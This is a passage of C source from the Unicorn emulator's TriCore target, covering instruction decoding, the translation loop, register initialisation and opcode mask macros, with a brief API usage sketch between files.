tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_ICR, tcg_ctx->cpu_ICR, MASK_ICR_IE_1_3); break; case OPC2_32_SYS_ISYNC: break; case OPC2_32_SYS_NOP: break; case 
OPC2_32_SYS_RET: gen_compute_branch(ctx, op2, 0, 0, 0, 0); break; case OPC2_32_SYS_FRET: gen_fret(ctx); break; case OPC2_32_SYS_RFE: gen_helper_rfe(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; break; case OPC2_32_SYS_RFM: if ((ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_SM) { tmp = tcg_temp_new(tcg_ctx); l1 = gen_new_label(tcg_ctx); tcg_gen_ld32u_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, DBGSR)); tcg_gen_andi_tl(tcg_ctx, tmp, tmp, MASK_DBGSR_DE); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tmp, 1, l1); gen_helper_rfm(tcg_ctx, tcg_ctx->cpu_env); gen_set_label(tcg_ctx, l1); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, tmp); } else { /* generate privilege trap */ } break; case OPC2_32_SYS_RSLCX: gen_helper_rslcx(tcg_ctx, tcg_ctx->cpu_env); break; case OPC2_32_SYS_SVLCX: gen_helper_svlcx(tcg_ctx, tcg_ctx->cpu_env); break; case OPC2_32_SYS_RESTORE: if (has_feature(ctx, TRICORE_FEATURE_16)) { if ((ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_SM || (ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_UM1) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_ICR, tcg_ctx->cpu_ICR, tcg_ctx->cpu_gpr_d[r1], 8, 1); } /* else raise privilege trap */ } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_SYS_TRAPSV: l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_SV, 0, l1); generate_trap(ctx, TRAPC_ASSERT, TIN5_SOVF); gen_set_label(tcg_ctx, l1); break; case OPC2_32_SYS_TRAPV: l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_V, 0, l1); generate_trap(ctx, TRAPC_ASSERT, TIN5_OVF); gen_set_label(tcg_ctx, l1); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_32Bit_opc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int op1; int32_t r1, r2, r3; int32_t address, const16; int8_t b, const4; int32_t bpos; TCGv temp, temp2, temp3; op1 = MASK_OP_MAJOR(ctx->opcode); /* handle JNZ.T opcode only being 7 bit long */ if (unlikely((op1 & 0x7f) == OPCM_32_BRN_JTT)) { op1 = OPCM_32_BRN_JTT; } switch (op1) { /* ABS-format */ case OPCM_32_ABS_LDW: decode_abs_ldw(ctx); break; case OPCM_32_ABS_LDB: decode_abs_ldb(ctx); break; case OPCM_32_ABS_LDMST_SWAP: decode_abs_ldst_swap(ctx); break; case OPCM_32_ABS_LDST_CONTEXT: decode_abs_ldst_context(ctx); break; case OPCM_32_ABS_STORE: decode_abs_store(ctx); break; case OPCM_32_ABS_STOREB_H: decode_abs_storeb_h(ctx); break; case OPC1_32_ABS_STOREQ: address = MASK_OP_ABS_OFF18(ctx->opcode); r1 = MASK_OP_ABS_S1D(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_qemu_st_tl(tcg_ctx, temp2, temp, ctx->mem_idx, MO_LEUW); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_ABS_LD_Q: address = MASK_OP_ABS_OFF18(ctx->opcode); r1 = MASK_OP_ABS_S1D(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], temp, ctx->mem_idx, MO_LEUW); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r1], 16); tcg_temp_free(tcg_ctx, temp); break; case OPC1_32_ABS_LEA: address = MASK_OP_ABS_OFF18(ctx->opcode); r1 = MASK_OP_ABS_S1D(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_a[r1], EA_ABS_FORMAT(address)); break; /* ABSB-format */ case OPC1_32_ABSB_ST_T: address = MASK_OP_ABS_OFF18(ctx->opcode); b = 
MASK_OP_ABSB_B(ctx->opcode); bpos = MASK_OP_ABSB_BPOS(ctx->opcode); temp = tcg_const_i32(tcg_ctx, EA_ABS_FORMAT(address)); temp2 = tcg_temp_new(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, temp2, temp, ctx->mem_idx, MO_UB); tcg_gen_andi_tl(tcg_ctx, temp2, temp2, ~(0x1u << bpos)); tcg_gen_ori_tl(tcg_ctx, temp2, temp2, (b << bpos)); tcg_gen_qemu_st_tl(tcg_ctx, temp2, temp, ctx->mem_idx, MO_UB); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); break; /* B-format */ case OPC1_32_B_CALL: case OPC1_32_B_CALLA: case OPC1_32_B_FCALL: case OPC1_32_B_FCALLA: case OPC1_32_B_J: case OPC1_32_B_JA: case OPC1_32_B_JL: case OPC1_32_B_JLA: address = MASK_OP_B_DISP24_SEXT(ctx->opcode); gen_compute_branch(ctx, op1, 0, 0, 0, address); break; /* Bit-format */ case OPCM_32_BIT_ANDACC: decode_bit_andacc(ctx); break; case OPCM_32_BIT_LOGICAL_T1: decode_bit_logical_t(ctx); break; case OPCM_32_BIT_INSERT: decode_bit_insert(ctx); break; case OPCM_32_BIT_LOGICAL_T2: decode_bit_logical_t2(ctx); break; case OPCM_32_BIT_ORAND: decode_bit_orand(ctx); break; case OPCM_32_BIT_SH_LOGIC1: decode_bit_sh_logic1(ctx); break; case OPCM_32_BIT_SH_LOGIC2: decode_bit_sh_logic2(ctx); break; /* BO Format */ case OPCM_32_BO_ADDRMODE_POST_PRE_BASE: decode_bo_addrmode_post_pre_base(ctx); break; case OPCM_32_BO_ADDRMODE_BITREVERSE_CIRCULAR: decode_bo_addrmode_bitreverse_circular(ctx); break; case OPCM_32_BO_ADDRMODE_LD_POST_PRE_BASE: decode_bo_addrmode_ld_post_pre_base(ctx); break; case OPCM_32_BO_ADDRMODE_LD_BITREVERSE_CIRCULAR: decode_bo_addrmode_ld_bitreverse_circular(ctx); break; case OPCM_32_BO_ADDRMODE_STCTX_POST_PRE_BASE: decode_bo_addrmode_stctx_post_pre_base(ctx); break; case OPCM_32_BO_ADDRMODE_LDMST_BITREVERSE_CIRCULAR: decode_bo_addrmode_ldmst_bitreverse_circular(ctx); break; /* BOL-format */ case OPC1_32_BOL_LD_A_LONGOFF: case OPC1_32_BOL_LD_W_LONGOFF: case OPC1_32_BOL_LEA_LONGOFF: case OPC1_32_BOL_ST_W_LONGOFF: case OPC1_32_BOL_ST_A_LONGOFF: case OPC1_32_BOL_LD_B_LONGOFF: case OPC1_32_BOL_LD_BU_LONGOFF: case OPC1_32_BOL_LD_H_LONGOFF: case OPC1_32_BOL_LD_HU_LONGOFF: case OPC1_32_BOL_ST_B_LONGOFF: case OPC1_32_BOL_ST_H_LONGOFF: decode_bol_opc(ctx, op1); break; /* BRC Format */ case OPCM_32_BRC_EQ_NEQ: case OPCM_32_BRC_GE: case OPCM_32_BRC_JLT: case OPCM_32_BRC_JNE: const4 = MASK_OP_BRC_CONST4_SEXT(ctx->opcode); address = MASK_OP_BRC_DISP15_SEXT(ctx->opcode); r1 = MASK_OP_BRC_S1(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, const4, address); break; /* BRN Format */ case OPCM_32_BRN_JTT: address = MASK_OP_BRN_DISP15_SEXT(ctx->opcode); r1 = MASK_OP_BRN_S1(ctx->opcode); gen_compute_branch(ctx, op1, r1, 0, 0, address); break; /* BRR Format */ case OPCM_32_BRR_EQ_NEQ: case OPCM_32_BRR_ADDR_EQ_NEQ: case OPCM_32_BRR_GE: case OPCM_32_BRR_JLT: case OPCM_32_BRR_JNE: case OPCM_32_BRR_JNZ: case OPCM_32_BRR_LOOP: address = MASK_OP_BRR_DISP15_SEXT(ctx->opcode); r2 = MASK_OP_BRR_S2(ctx->opcode); r1 = MASK_OP_BRR_S1(ctx->opcode); gen_compute_branch(ctx, op1, r1, r2, 0, address); break; /* RC Format */ case OPCM_32_RC_LOGICAL_SHIFT: decode_rc_logical_shift(ctx); break; case OPCM_32_RC_ACCUMULATOR: decode_rc_accumulator(ctx); break; case OPCM_32_RC_SERVICEROUTINE: decode_rc_serviceroutine(ctx); break; case OPCM_32_RC_MUL: decode_rc_mul(ctx); break; /* RCPW Format */ case OPCM_32_RCPW_MASK_INSERT: decode_rcpw_insert(ctx); break; /* RCRR Format */ case OPC1_32_RCRR_INSERT: r1 = MASK_OP_RCRR_S1(ctx->opcode); r2 = MASK_OP_RCRR_S3(ctx->opcode); r3 = MASK_OP_RCRR_D(ctx->opcode); const16 = MASK_OP_RCRR_CONST4(ctx->opcode); temp = 
tcg_const_i32(tcg_ctx, const16); temp2 = tcg_temp_new(tcg_ctx); /* width*/ temp3 = tcg_temp_new(tcg_ctx); /* pos */ CHECK_REG_PAIR(r3); tcg_gen_andi_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r3+1], 0x1f); tcg_gen_andi_tl(tcg_ctx, temp3, tcg_ctx->cpu_gpr_d[r3], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r2], tcg_ctx->cpu_gpr_d[r1], temp, temp2, temp3); tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); tcg_temp_free(tcg_ctx, temp3); break; /* RCRW Format */ case OPCM_32_RCRW_MASK_INSERT: decode_rcrw_insert(ctx); break; /* RCR Format */ case OPCM_32_RCR_COND_SELECT: decode_rcr_cond_select(ctx); break; case OPCM_32_RCR_MADD: decode_rcr_madd(ctx); break; case OPCM_32_RCR_MSUB: decode_rcr_msub(ctx); break; /* RLC Format */ case OPC1_32_RLC_ADDI: case OPC1_32_RLC_ADDIH: case OPC1_32_RLC_ADDIH_A: case OPC1_32_RLC_MFCR: case OPC1_32_RLC_MOV: case OPC1_32_RLC_MOV_64: case OPC1_32_RLC_MOV_U: case OPC1_32_RLC_MOV_H: case OPC1_32_RLC_MOVH_A: case OPC1_32_RLC_MTCR: decode_rlc_opc(ctx, op1); break; /* RR Format */ case OPCM_32_RR_ACCUMULATOR: decode_rr_accumulator(ctx); break; case OPCM_32_RR_LOGICAL_SHIFT: decode_rr_logical_shift(ctx); break; case OPCM_32_RR_ADDRESS: decode_rr_address(ctx); break; case OPCM_32_RR_IDIRECT: decode_rr_idirect(ctx); break; case OPCM_32_RR_DIVIDE: decode_rr_divide(ctx); break; /* RR1 Format */ case OPCM_32_RR1_MUL: decode_rr1_mul(ctx); break; case OPCM_32_RR1_MULQ: decode_rr1_mulq(ctx); break; /* RR2 format */ case OPCM_32_RR2_MUL: decode_rr2_mul(ctx); break; /* RRPW format */ case OPCM_32_RRPW_EXTRACT_INSERT: decode_rrpw_extract_insert(ctx); break; case OPC1_32_RRPW_DEXTR: r1 = MASK_OP_RRPW_S1(ctx->opcode); r2 = MASK_OP_RRPW_S2(ctx->opcode); r3 = MASK_OP_RRPW_D(ctx->opcode); const16 = MASK_OP_RRPW_POS(ctx->opcode); if (r1 == r2) { tcg_gen_rotli_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], const16); } else { temp = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], const16); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r2], 32 - const16); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3], temp); tcg_temp_free(tcg_ctx, temp); } break; /* RRR Format */ case OPCM_32_RRR_COND_SELECT: decode_rrr_cond_select(ctx); break; case OPCM_32_RRR_DIVIDE: decode_rrr_divide(ctx); break; /* RRR2 Format */ case OPCM_32_RRR2_MADD: decode_rrr2_madd(ctx); break; case OPCM_32_RRR2_MSUB: decode_rrr2_msub(ctx); break; /* RRR1 format */ case OPCM_32_RRR1_MADD: decode_rrr1_madd(ctx); break; case OPCM_32_RRR1_MADDQ_H: decode_rrr1_maddq_h(ctx); break; case OPCM_32_RRR1_MADDSU_H: decode_rrr1_maddsu_h(ctx); break; case OPCM_32_RRR1_MSUB_H: decode_rrr1_msub(ctx); break; case OPCM_32_RRR1_MSUB_Q: decode_rrr1_msubq_h(ctx); break; case OPCM_32_RRR1_MSUBAD_H: decode_rrr1_msubad_h(ctx); break; /* RRRR format */ case OPCM_32_RRRR_EXTRACT_INSERT: decode_rrrr_extract_insert(ctx); break; /* RRRW format */ case OPCM_32_RRRW_EXTRACT_INSERT: decode_rrrw_extract_insert(ctx); break; /* SYS format */ case OPCM_32_SYS_INTERRUPTS: decode_sys_interrupts(ctx); break; case OPC1_32_SYS_RSTV: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_PSW_V, 0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_SV, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_AV, tcg_ctx->cpu_PSW_V); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_PSW_SAV, tcg_ctx->cpu_PSW_V); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static bool tricore_insn_is_16bit(uint32_t insn) { return (insn & 0x1) == 0; } static void tricore_tr_init_disas_context(DisasContextBase 
*dcbase, CPUState *cs) { DisasContext *ctx = container_of(dcbase, DisasContext, base); CPUTriCoreState *env = cs->env_ptr; // unicorn setup ctx->uc = cs->uc; ctx->mem_idx = cpu_mmu_index(env, false); ctx->hflags = (uint32_t)ctx->base.tb->flags; ctx->features = env->features; } static void tricore_tr_tb_start(DisasContextBase *db, CPUState *cpu) { } static void tricore_tr_insn_start(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_insn_start(tcg_ctx, ctx->base.pc_next); } static bool insn_crosses_page(CPUTriCoreState *env, DisasContext *ctx) { /* * Return true if the insn at ctx->base.pc_next might cross a page boundary. * (False positives are OK, false negatives are not.) * Our caller ensures we are only called if dc->base.pc_next is less than * 4 bytes from the page boundary, so we cross the page if the first * 16 bits indicate that this is a 32 bit insn. */ uint16_t insn = cpu_lduw_code(env, ctx->base.pc_next); return !tricore_insn_is_16bit(insn); } static void tricore_tr_translate_insn(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); struct uc_struct *uc = ctx->uc; TCGContext *tcg_ctx = ctx->uc->tcg_ctx; CPUTriCoreState *env = cpu->env_ptr; uint16_t insn_lo; bool is_16bit; uint32_t insn_size; // Unicorn: end address tells us to stop emulation if (uc_addr_is_exit(uc, ctx->base.pc_next)) { ctx->base.is_jmp = DISAS_UC_EXIT; } else { insn_lo = cpu_lduw_code(env, ctx->base.pc_next); is_16bit = tricore_insn_is_16bit(insn_lo); insn_size = is_16bit ? 2 : 4; // Unicorn: trace this instruction on request if (HOOK_EXISTS_BOUNDED(ctx->uc, UC_HOOK_CODE, ctx->base.pc_next)) { // Sync PC in advance gen_save_pc(ctx, ctx->base.pc_next); gen_uc_tracecode(tcg_ctx, insn_size, UC_HOOK_CODE_IDX, ctx->uc, ctx->base.pc_next); // the callback might want to stop emulation immediately check_exit_request(tcg_ctx); } if (is_16bit) { ctx->opcode = insn_lo; ctx->pc_succ_insn = ctx->base.pc_next + 2; decode_16Bit_opc(ctx); } else { uint32_t insn_hi = cpu_lduw_code(env, ctx->base.pc_next + 2); ctx->opcode = insn_hi << 16 | insn_lo; ctx->pc_succ_insn = ctx->base.pc_next + 4; decode_32Bit_opc(ctx); } ctx->base.pc_next = ctx->pc_succ_insn; if (ctx->base.is_jmp == DISAS_NEXT) { target_ulong page_start; page_start = ctx->base.pc_first & TARGET_PAGE_MASK; if (ctx->base.pc_next - page_start >= TARGET_PAGE_SIZE || (ctx->base.pc_next - page_start >= TARGET_PAGE_SIZE - 3 && insn_crosses_page(env, ctx))) { ctx->base.is_jmp = DISAS_TOO_MANY; } } } } static void tricore_tr_tb_stop(DisasContextBase *dcbase, CPUState *cpu) { DisasContext *ctx = container_of(dcbase, DisasContext, base); // if (ctx->base.singlestep_enabled && ctx->base.is_jmp != DISAS_NORETURN) { // save_cpu_state(ctx, ctx->base.is_jmp != DISAS_EXIT); // gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); // } else { switch (ctx->base.is_jmp) { case DISAS_TOO_MANY: gen_goto_tb(ctx, 0, ctx->base.pc_next); break; case DISAS_UC_EXIT: gen_save_pc(ctx, ctx->base.pc_next); gen_helper_uc_tricore_exit(ctx->uc->tcg_ctx, ctx->uc->tcg_ctx->cpu_env); break; case DISAS_NORETURN: break; default: g_assert_not_reached(); } } static const TranslatorOps tricore_tr_ops = { .init_disas_context = tricore_tr_init_disas_context, .tb_start = tricore_tr_tb_start, .insn_start = tricore_tr_insn_start, .translate_insn = tricore_tr_translate_insn, .tb_stop = tricore_tr_tb_stop, }; void gen_intermediate_code(CPUState *cs, 
TranslationBlock *tb, int max_insns)
{
    DisasContext ctx;
    memset(&ctx, 0, sizeof(ctx));
    translator_loop(&tricore_tr_ops, &ctx.base, cs, tb, max_insns);
}

void restore_state_to_opc(CPUTriCoreState *env, TranslationBlock *tb,
                          target_ulong *data)
{
    env->PC = data[0];
}

/*
 *
 * Initialization
 *
 */

void cpu_state_reset(CPUTriCoreState *env)
{
    /* Reset Regs to Default Value */
    env->PSW = 0xb80;
    fpu_set_state(env);
}

static void tricore_tcg_init_csfr(struct uc_struct *uc)
{
    TCGContext *tcg_ctx = uc->tcg_ctx;

    tcg_ctx->cpu_PCXI = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env,
                                           offsetof(CPUTriCoreState, PCXI), "PCXI");
    tcg_ctx->cpu_PSW = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env,
                                          offsetof(CPUTriCoreState, PSW), "PSW");
    tcg_ctx->cpu_PC = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env,
                                         offsetof(CPUTriCoreState, PC), "PC");
    tcg_ctx->cpu_ICR = tcg_global_mem_new(tcg_ctx, tcg_ctx->cpu_env,
                                          offsetof(CPUTriCoreState, ICR), "ICR");
}

void tricore_tcg_init(struct uc_struct *uc)
{
    TCGContext *tcg_ctx = uc->tcg_ctx;
    int i;

    /* reg init */
    for (i = 0 ; i < 16 ; i++) {
        tcg_ctx->cpu_gpr_a[i] = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                                   offsetof(CPUTriCoreState, gpr_a[i]),
                                                   regnames_a[i]);
    }
    for (i = 0 ; i < 16 ; i++) {
        tcg_ctx->cpu_gpr_d[i] = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                                   offsetof(CPUTriCoreState, gpr_d[i]),
                                                   regnames_d[i]);
    }
    tricore_tcg_init_csfr(uc);
    /* init PSW flag cache */
    tcg_ctx->cpu_PSW_C = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                            offsetof(CPUTriCoreState, PSW_USB_C), "PSW_C");
    tcg_ctx->cpu_PSW_V = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                            offsetof(CPUTriCoreState, PSW_USB_V), "PSW_V");
    tcg_ctx->cpu_PSW_SV = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                             offsetof(CPUTriCoreState, PSW_USB_SV), "PSW_SV");
    tcg_ctx->cpu_PSW_AV = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                             offsetof(CPUTriCoreState, PSW_USB_AV), "PSW_AV");
    tcg_ctx->cpu_PSW_SAV = tcg_global_mem_new(uc->tcg_ctx, tcg_ctx->cpu_env,
                                              offsetof(CPUTriCoreState, PSW_USB_SAV), "PSW_SAV");
}
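The translator above is not called directly; it is reached through Unicorn's public API once an engine is opened with UC_ARCH_TRICORE. A minimal sketch of that path follows (error handling trimmed; the two instruction bytes encode a `mov %d0, 1`, derived from the SRC field masks and OPC1_16_SRC_MOV = 0x82 defined in tricore-opcodes.h below):

#include <stdio.h>
#include <stdint.h>
#include <unicorn/unicorn.h>

int main(void)
{
    uc_engine *uc;
    const uint64_t base = 0x10000;
    /* 0x1082 = SRC format: op1 = 0x82 (MOV), S1D = 0 (d0), const4 = 1 */
    const uint8_t code[] = {0x82, 0x10};
    uint32_t d0 = 0;

    if (uc_open(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN, &uc) != UC_ERR_OK) {
        return 1;
    }
    uc_mem_map(uc, base, 0x1000, UC_PROT_ALL);   /* one 4K page for code */
    uc_mem_write(uc, base, code, sizeof(code));
    /* translation of this 16-bit insn lands in decode_16Bit_opc() above */
    uc_emu_start(uc, base, base + sizeof(code), 0, 0);
    uc_reg_read(uc, UC_TRICORE_REG_D0, &d0);
    printf("d0 = %u\n", d0);                     /* expect 1 */
    uc_close(uc);
    return 0;
}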
unicorn-2.1.1/qemu/target/tricore/tricore-defs.h

/*
 * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef QEMU_TRICORE_DEFS_H
#define QEMU_TRICORE_DEFS_H

#define TRICORE_TLB_MAX 128

#endif /* QEMU_TRICORE_DEFS_H */

unicorn-2.1.1/qemu/target/tricore/tricore-opcodes.h

/*
 * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef TARGET_TRICORE_TRICORE_OPCODES_H
#define TARGET_TRICORE_TRICORE_OPCODES_H

/*
 * Opcode Masks for Tricore
 * Format MASK_OP_InstrFormatName_Field
 */

/* This creates a mask with bits start ..
end set to 1 and applies it to op */ #define MASK_BITS_SHIFT(op, start, end) (extract32(op, (start), \ (end) - (start) + 1)) #define MASK_BITS_SHIFT_SEXT(op, start, end) (sextract32(op, (start),\ (end) - (start) + 1)) /* new opcode masks */ #define MASK_OP_MAJOR(op) MASK_BITS_SHIFT(op, 0, 7) /* 16-Bit Formats */ #define MASK_OP_SB_DISP8(op) MASK_BITS_SHIFT(op, 8, 15) #define MASK_OP_SB_DISP8_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 8, 15) #define MASK_OP_SBC_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SBC_CONST4_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 15) #define MASK_OP_SBC_DISP4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SBR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SBR_DISP4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SBRN_N(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SBRN_DISP4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SC_CONST8(op) MASK_BITS_SHIFT(op, 8, 15) #define MASK_OP_SLR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SLR_D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SLRO_OFF4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SLRO_D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SR_OP2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SR_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRC_CONST4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRC_CONST4_SEXT(op) MASK_BITS_SHIFT_SEXT(op, 12, 15) #define MASK_OP_SRC_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRO_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRO_OFF4(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRR_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRRS_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SRRS_S1D(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SRRS_N(op) MASK_BITS_SHIFT(op, 6, 7) #define MASK_OP_SSR_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SSR_S1(op) MASK_BITS_SHIFT(op, 8, 11) #define MASK_OP_SSRO_OFF4(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_SSRO_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* 32-Bit Formats */ /* ABS Format */ #define MASK_OP_ABS_OFF18(op) (MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6) + \ (MASK_BITS_SHIFT(op, 22, 25) << 10) +\ (MASK_BITS_SHIFT(op, 12, 15) << 14)) #define MASK_OP_ABS_OP2(op) MASK_BITS_SHIFT(op, 26, 27) #define MASK_OP_ABS_S1D(op) MASK_BITS_SHIFT(op, 8, 11) /* ABSB Format */ #define MASK_OP_ABSB_OFF18(op) MASK_OP_ABS_OFF18(op) #define MASK_OP_ABSB_OP2(op) MASK_BITS_SHIFT(op, 26, 27) #define MASK_OP_ABSB_B(op) MASK_BITS_SHIFT(op, 11, 11) #define MASK_OP_ABSB_BPOS(op) MASK_BITS_SHIFT(op, 8, 10) /* B Format */ #define MASK_OP_B_DISP24(op) (MASK_BITS_SHIFT(op, 16, 31) + \ (MASK_BITS_SHIFT(op, 8, 15) << 16)) #define MASK_OP_B_DISP24_SEXT(op) (MASK_BITS_SHIFT(op, 16, 31) + \ (MASK_BITS_SHIFT_SEXT(op, 8, 15) << 16)) /* BIT Format */ #define MASK_OP_BIT_D(op) MASK_BITS_SHIFT(op, 28, 31) #define MASK_OP_BIT_POS2(op) MASK_BITS_SHIFT(op, 23, 27) #define MASK_OP_BIT_OP2(op) MASK_BITS_SHIFT(op, 21, 22) #define MASK_OP_BIT_POS1(op) MASK_BITS_SHIFT(op, 16, 20) #define MASK_OP_BIT_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BIT_S1(op) MASK_BITS_SHIFT(op, 8, 11) /* BO Format */ #define MASK_OP_BO_OFF10(op) (MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT(op, 28, 31) << 6)) #define MASK_OP_BO_OFF10_SEXT(op) (MASK_BITS_SHIFT(op, 16, 21) + \ (MASK_BITS_SHIFT_SEXT(op, 28, 31) << 6)) #define MASK_OP_BO_OP2(op) MASK_BITS_SHIFT(op, 22, 27) #define MASK_OP_BO_S2(op) MASK_BITS_SHIFT(op, 12, 15) #define MASK_OP_BO_S1D(op) MASK_BITS_SHIFT(op, 8, 11) /* BOL 
